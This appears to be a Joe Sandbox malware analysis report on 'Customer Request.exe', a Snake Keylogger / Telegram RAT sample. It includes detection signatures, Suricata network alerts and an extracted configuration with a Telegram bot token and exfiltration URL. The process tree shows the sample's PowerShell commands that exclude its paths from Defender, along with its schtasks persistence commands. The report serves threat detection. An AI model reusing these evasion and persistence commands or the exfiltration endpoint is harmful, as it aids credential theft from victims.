Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Customer Request.exe

Overview

General Information

Sample name:Customer Request.exe
Analysis ID:1619174
MD5:af70a8bace079f5eb7762fbbec4772ab
SHA1:ae3530a619d587110da7beb2b1511ad3dc44a325
SHA256:a69b613b4c99988b72e10c917489d5a7006b53abc75f7706b578e8b27f3252ab
Tags:exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Moves itself to temp directory
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Customer Request.exe (PID: 5944 cmdline: "C:\Users\user\Desktop\Customer Request.exe" MD5: AF70A8BACE079F5EB7762FBBEC4772AB)
    • powershell.exe (PID: 4640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gCFuOglEso.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7184 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6768 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Customer Request.exe (PID: 2384 cmdline: "C:\Users\user\Desktop\Customer Request.exe" MD5: AF70A8BACE079F5EB7762FBBEC4772AB)
    • Customer Request.exe (PID: 5932 cmdline: "C:\Users\user\Desktop\Customer Request.exe" MD5: AF70A8BACE079F5EB7762FBBEC4772AB)
  • gCFuOglEso.exe (PID: 4500 cmdline: C:\Users\user\AppData\Roaming\gCFuOglEso.exe MD5: AF70A8BACE079F5EB7762FBBEC4772AB)
    • schtasks.exe (PID: 7344 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gCFuOglEso.exe (PID: 7388 cmdline: "C:\Users\user\AppData\Roaming\gCFuOglEso.exe" MD5: AF70A8BACE079F5EB7762FBBEC4772AB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendMessage?chat_id=5007084465", "Token": "7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM", "Chat_id": "5007084465", "Version": "5.1"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    sslproxydump.pcapMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
    • 0xeee7:$m3: SnakePW
    • 0xf455:$m3: SnakePW
    • 0x10a60:$m3: SnakePW
    • 0xc7f34:$m3: SnakePW
    • 0x11171:$m4: \SnakeKeylogger\
    • 0xc8e7b:$m4: \SnakeKeylogger\
    • 0x180628:$m4: \SnakeKeylogger\
    • 0x237df2:$m4: \SnakeKeylogger\
    • 0x2ef5b7:$m4: \SnakeKeylogger\
    • 0x3a6d8c:$m4: \SnakeKeylogger\
    • 0x45e544:$m4: \SnakeKeylogger\
    • 0x5154cd:$m4: \SnakeKeylogger\
    • 0x5cd4d1:$m4: \SnakeKeylogger\
    • 0x68445a:$m4: \SnakeKeylogger\
    • 0x73c46a:$m4: \SnakeKeylogger\
    • 0x7f33f3:$m4: \SnakeKeylogger\
    • 0x8ab3f2:$m4: \SnakeKeylogger\
    • 0x96237b:$m4: \SnakeKeylogger\
    • 0xa19b4b:$m4: \SnakeKeylogger\
    • 0xad1b4a:$m4: \SnakeKeylogger\
    • 0xb90c70:$m4: \SnakeKeylogger\

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.2710969497.0000000003198000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000F.00000002.2704835617.0000000000AF7000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        0000000F.00000002.2710539876.0000000002BCB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          0000000F.00000002.2710539876.0000000002B2A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            0000000F.00000002.2710539876.0000000002AEE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              Click to see the 54 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              10.2.Customer Request.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
              • 0x157db:$s1: UnHook
              • 0x157e2:$s2: SetHook
              • 0x157ea:$s3: CallNextHook
              • 0x157f7:$s4: _hook
              11.2.gCFuOglEso.exe.3e6a8e8.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                11.2.gCFuOglEso.exe.3e6a8e8.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                  11.2.gCFuOglEso.exe.3e6a8e8.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x12df6:$a1: get_encryptedPassword
                  • 0x130e2:$a2: get_encryptedUsername
                  • 0x12bf2:$a3: get_timePasswordChanged
                  • 0x12ced:$a4: get_passwordField
                  • 0x12e0c:$a5: set_encryptedPassword
                  • 0x1445e:$a7: get_logins
                  • 0x143c1:$a10: KeyLoggerEventArgs
                  • 0x1402c:$a11: KeyLoggerEventArgsEventHandler
                  11.2.gCFuOglEso.exe.3e6a8e8.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x1a8bc:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x19aee:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x19f21:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x1af60:$a5: \Kometa\User Data\Default\Login Data
                  Click to see the 44 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Customer Request.exe", ParentImage: C:\Users\user\Desktop\Customer Request.exe, ParentProcessId: 5944, ParentProcessName: Customer Request.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", ProcessId: 4640, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Customer Request.exe", ParentImage: C:\Users\user\Desktop\Customer Request.exe, ParentProcessId: 5944, ParentProcessName: Customer Request.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", ProcessId: 4640, ProcessName: powershell.exe
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\gCFuOglEso.exe, ParentImage: C:\Users\user\AppData\Roaming\gCFuOglEso.exe, ParentProcessId: 4500, ParentProcessName: gCFuOglEso.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmp91E1.tmp", ProcessId: 7344, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Customer Request.exe", ParentImage: C:\Users\user\Desktop\Customer Request.exe, ParentProcessId: 5944, ParentProcessName: Customer Request.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp", ProcessId: 6768, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Customer Request.exe", ParentImage: C:\Users\user\Desktop\Customer Request.exe, ParentProcessId: 5944, ParentProcessName: Customer Request.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Customer Request.exe", ProcessId: 4640, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Customer Request.exe", ParentImage: C:\Users\user\Desktop\Customer Request.exe, ParentProcessId: 5944, ParentProcessName: Customer Request.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gCFuOglEso" /XML "C:\Users\user\AppData\Local\Temp\tmpBA61.tmp", ProcessId: 6768, ProcessName: schtasks.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-19T16:38:26.420075+010028033053Unknown Traffic192.168.2.849715104.21.112.1443TCP
                  2025-02-19T16:38:29.409877+010028033053Unknown Traffic192.168.2.849721104.21.112.1443TCP
                  2025-02-19T16:38:31.772843+010028033053Unknown Traffic192.168.2.849724104.21.112.1443TCP
                  2025-02-19T16:38:36.789061+010028033053Unknown Traffic192.168.2.849733104.21.112.1443TCP
                  2025-02-19T16:38:36.798154+010028033053Unknown Traffic192.168.2.849734104.21.112.1443TCP
                  2025-02-19T16:38:38.402818+010028033053Unknown Traffic192.168.2.849738104.21.112.1443TCP
                  2025-02-19T16:38:48.333273+010028033053Unknown Traffic192.168.2.849746104.21.112.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-19T16:38:24.507467+010028032742Potentially Bad Traffic192.168.2.849712132.226.8.16980TCP
                  2025-02-19T16:38:25.959932+010028032742Potentially Bad Traffic192.168.2.849712132.226.8.16980TCP
                  2025-02-19T16:38:27.381782+010028032742Potentially Bad Traffic192.168.2.849717132.226.8.16980TCP
                  2025-02-19T16:38:28.584928+010028032742Potentially Bad Traffic192.168.2.849718132.226.8.16980TCP
                  2025-02-19T16:38:28.834923+010028032742Potentially Bad Traffic192.168.2.849720132.226.8.16980TCP
                  2025-02-19T16:38:31.084905+010028032742Potentially Bad Traffic192.168.2.849718132.226.8.16980TCP
                  2025-02-19T16:38:33.538053+010028032742Potentially Bad Traffic192.168.2.849727132.226.8.16980TCP
                  2025-02-19T16:38:36.006789+010028032742Potentially Bad Traffic192.168.2.849730132.226.8.16980TCP
                  2025-02-19T16:38:38.772425+010028032742Potentially Bad Traffic192.168.2.849737132.226.8.16980TCP
                  2025-02-19T16:38:41.569306+010028032742Potentially Bad Traffic192.168.2.849740132.226.8.16980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-19T16:38:44.751974+010028530061A Network Trojan was detected192.168.2.849743149.154.167.220443TCP
                  2025-02-19T16:38:55.245532+010028530061A Network Trojan was detected192.168.2.849747149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-19T16:38:44.355485+010018100081Potentially Bad Traffic192.168.2.849743149.154.167.220443TCP
                  2025-02-19T16:38:54.815601+010018100081Potentially Bad Traffic192.168.2.849747149.154.167.220443TCP
                  2025-02-19T16:38:55.137343+010018100081Potentially Bad Traffic192.168.2.849748149.154.167.220443TCP
                  2025-02-19T16:38:56.997076+010018100081Potentially Bad Traffic192.168.2.849749149.154.167.220443TCP
                  2025-02-19T16:38:58.678083+010018100081Potentially Bad Traffic192.168.2.849750149.154.167.220443TCP
                  2025-02-19T16:39:00.660343+010018100081Potentially Bad Traffic192.168.2.849751149.154.167.220443TCP
                  2025-02-19T16:39:02.295453+010018100081Potentially Bad Traffic192.168.2.849752149.154.167.220443TCP
                  2025-02-19T16:39:04.049970+010018100081Potentially Bad Traffic192.168.2.849753149.154.167.220443TCP
                  2025-02-19T16:39:05.252356+010018100081Potentially Bad Traffic192.168.2.849754149.154.167.220443TCP
                  2025-02-19T16:39:05.843812+010018100081Potentially Bad Traffic192.168.2.849755149.154.167.220443TCP
                  2025-02-19T16:39:07.013538+010018100081Potentially Bad Traffic192.168.2.849756149.154.167.220443TCP
                  2025-02-19T16:39:07.609277+010018100081Potentially Bad Traffic192.168.2.849757149.154.167.220443TCP
                  2025-02-19T16:39:08.930533+010018100081Potentially Bad Traffic192.168.2.849758149.154.167.220443TCP
                  2025-02-19T16:39:09.413267+010018100081Potentially Bad Traffic192.168.2.849759149.154.167.220443TCP
                  2025-02-19T16:39:10.678492+010018100081Potentially Bad Traffic192.168.2.849760149.154.167.220443TCP
                  2025-02-19T16:39:11.045090+010018100081Potentially Bad Traffic192.168.2.849761149.154.167.220443TCP
                  2025-02-19T16:39:13.212372+010018100081Potentially Bad Traffic192.168.2.849762149.154.167.220443TCP
                  2025-02-19T16:39:14.182734+010018100081Potentially Bad Traffic192.168.2.849764149.154.167.220443TCP
                  2025-02-19T16:39:14.998645+010018100081Potentially Bad Traffic192.168.2.849765149.154.167.220443TCP
                  2025-02-19T16:39:16.012936+010018100081Potentially Bad Traffic192.168.2.849766149.154.167.220443TCP
                  2025-02-19T16:39:16.640024+010018100081Potentially Bad Traffic192.168.2.849767149.154.167.220443TCP
                  2025-02-19T16:39:17.774253+010018100081Potentially Bad Traffic192.168.2.849768149.154.167.220443TCP
                  2025-02-19T16:39:18.851088+010018100081Potentially Bad Traffic192.168.2.849769149.154.167.220443TCP
                  2025-02-19T16:39:19.476478+010018100081Potentially Bad Traffic192.168.2.849770149.154.167.220443TCP
                  2025-02-19T16:39:20.968915+010018100081Potentially Bad Traffic192.168.2.849771149.154.167.220443TCP
                  2025-02-19T16:39:21.744463+010018100081Potentially Bad Traffic192.168.2.849772149.154.167.220443TCP
                  2025-02-19T16:39:22.649743+010018100081Potentially Bad Traffic192.168.2.849773149.154.167.220443TCP
                  2025-02-19T16:39:23.436050+010018100081Potentially Bad Traffic192.168.2.849774149.154.167.220443TCP
                  2025-02-19T16:39:24.821611+010018100081Potentially Bad Traffic192.168.2.849775149.154.167.220443TCP
                  2025-02-19T16:39:25.120389+010018100081Potentially Bad Traffic192.168.2.849776149.154.167.220443TCP
                  2025-02-19T16:39:26.514874+010018100081Potentially Bad Traffic192.168.2.849777149.154.167.220443TCP
                  2025-02-19T16:39:26.788390+010018100081Potentially Bad Traffic192.168.2.849778149.154.167.220443TCP
                  2025-02-19T16:39:28.486003+010018100081Potentially Bad Traffic192.168.2.849779149.154.167.220443TCP
                  2025-02-19T16:39:28.602096+010018100081Potentially Bad Traffic192.168.2.849780149.154.167.220443TCP
                  2025-02-19T16:39:31.054616+010018100081Potentially Bad Traffic192.168.2.849781149.154.167.220443TCP
                  2025-02-19T16:39:31.069529+010018100081Potentially Bad Traffic192.168.2.849782149.154.167.220443TCP
                  2025-02-19T16:39:32.795177+010018100081Potentially Bad Traffic192.168.2.849783149.154.167.220443TCP
                  2025-02-19T16:39:33.184254+010018100081Potentially Bad Traffic192.168.2.849784149.154.167.220443TCP
                  2025-02-19T16:39:34.605898+010018100081Potentially Bad Traffic192.168.2.849786149.154.167.220443TCP
                  2025-02-19T16:39:34.878087+010018100081Potentially Bad Traffic192.168.2.849787149.154.167.220443TCP
                  2025-02-19T16:39:36.779494+010018100081Potentially Bad Traffic192.168.2.849798149.154.167.220443TCP
                  2025-02-19T16:39:36.924827+010018100081Potentially Bad Traffic192.168.2.849803149.154.167.220443TCP
                  2025-02-19T16:39:38.650751+010018100081Potentially Bad Traffic192.168.2.849815149.154.167.220443TCP
                  2025-02-19T16:39:39.221052+010018100081Potentially Bad Traffic192.168.2.849816149.154.167.220443TCP
                  2025-02-19T16:39:40.493856+010018100081Potentially Bad Traffic192.168.2.849823149.154.167.220443TCP
                  2025-02-19T16:39:41.862826+010018100081Potentially Bad Traffic192.168.2.849834149.154.167.220443TCP
                  2025-02-19T16:39:42.129743+010018100081Potentially Bad Traffic192.168.2.849837149.154.167.220443TCP
                  2025-02-19T16:39:43.490463+010018100081Potentially Bad Traffic192.168.2.849846149.154.167.220443TCP
                  2025-02-19T16:39:43.751866+010018100081Potentially Bad Traffic192.168.2.849850149.154.167.220443TCP
                  2025-02-19T16:39:45.122465+010018100081Potentially Bad Traffic192.168.2.849858149.154.167.220443TCP
                  2025-02-19T16:39:45.423792+010018100081Potentially Bad Traffic192.168.2.849862149.154.167.220443TCP
                  2025-02-19T16:39:46.918258+010018100081Potentially Bad Traffic192.168.2.849873149.154.167.220443TCP
                  2025-02-19T16:39:47.058058+010018100081Potentially Bad Traffic192.168.2.849874149.154.167.220443TCP
                  2025-02-19T16:39:48.721998+010018100081Potentially Bad Traffic192.168.2.849887149.154.167.220443TCP
                  2025-02-19T16:39:48.864914+010018100081Potentially Bad Traffic192.168.2.849886149.154.167.220443TCP
                  2025-02-19T16:39:50.357882+010018100081Potentially Bad Traffic192.168.2.849894149.154.167.220443TCP
                  2025-02-19T16:39:50.478485+010018100081Potentially Bad Traffic192.168.2.849895149.154.167.220443TCP
                  2025-02-19T16:39:52.076081+010018100081Potentially Bad Traffic192.168.2.849908149.154.167.220443TCP
                  2025-02-19T16:39:52.275612+010018100081Potentially Bad Traffic192.168.2.849912149.154.167.220443TCP
                  2025-02-19T16:39:53.802049+010018100081Potentially Bad Traffic192.168.2.849922149.154.167.220443TCP
                  2025-02-19T16:39:53.962070+010018100081Potentially Bad Traffic192.168.2.849924149.154.167.220443TCP
                  2025-02-19T16:39:55.470819+010018100081Potentially Bad Traffic192.168.2.849935149.154.167.220443TCP
                  2025-02-19T16:39:55.692966+010018100081Potentially Bad Traffic192.168.2.849936149.154.167.220443TCP
                  2025-02-19T16:39:57.142783+010018100081Potentially Bad Traffic192.168.2.849947149.154.167.220443TCP
                  2025-02-19T16:39:57.372529+010018100081Potentially Bad Traffic192.168.2.849949149.154.167.220443TCP
                  2025-02-19T16:39:58.871157+010018100081Potentially Bad Traffic192.168.2.849960149.154.167.220443TCP
                  2025-02-19T16:39:59.048871+010018100081Potentially Bad Traffic192.168.2.849961149.154.167.220443TCP
                  2025-02-19T16:40:00.578443+010018100081Potentially Bad Traffic192.168.2.849972149.154.167.220443TCP
                  2025-02-19T16:40:04.167517+010018100081Potentially Bad Traffic192.168.2.849996149.154.167.220443TCP
                  2025-02-19T16:40:05.210138+010018100081Potentially Bad Traffic192.168.2.850002149.154.167.220443TCP
                  2025-02-19T16:40:21.675180+010018100081Potentially Bad Traffic192.168.2.850091149.154.167.220443TCP
                  2025-02-19T16:40:31.586150+010018100081Potentially Bad Traffic192.168.2.850096149.154.167.220443TCP
                  2025-02-19T16:40:32.217766+010018100081Potentially Bad Traffic192.168.2.850097149.154.167.220443TCP
                  2025-02-19T16:40:33.251871+010018100081Potentially Bad Traffic192.168.2.850098149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 0000000F.00000002.2710539876.0000000002A01000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendMessage?chat_id=5007084465", "Token": "7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM", "Chat_id": "5007084465", "Version": "5.1"}
                  Source: gCFuOglEso.exe.7388.15.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendMessage"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\tmpG548.tmp (copy)ReversingLabs: Detection: 31%
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeReversingLabs: Detection: 31%
                  Multi AV Scanner detection for submitted file
                  Source: Customer Request.exeVirustotal: Detection: 40%Perma Link
                  Source: Customer Request.exeReversingLabs: Detection: 31%
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Sample uses string decryption to hide its real strings
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpackString decryptor:
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpackString decryptor: 7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpackString decryptor: 5007084465
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpackString decryptor:
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpackString decryptor: 7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM
                  Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpackString decryptor: 5007084465

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Customer Request.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49713 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49722 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49747 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50014 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50024 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50087 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50088 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50089 version: TLS 1.2
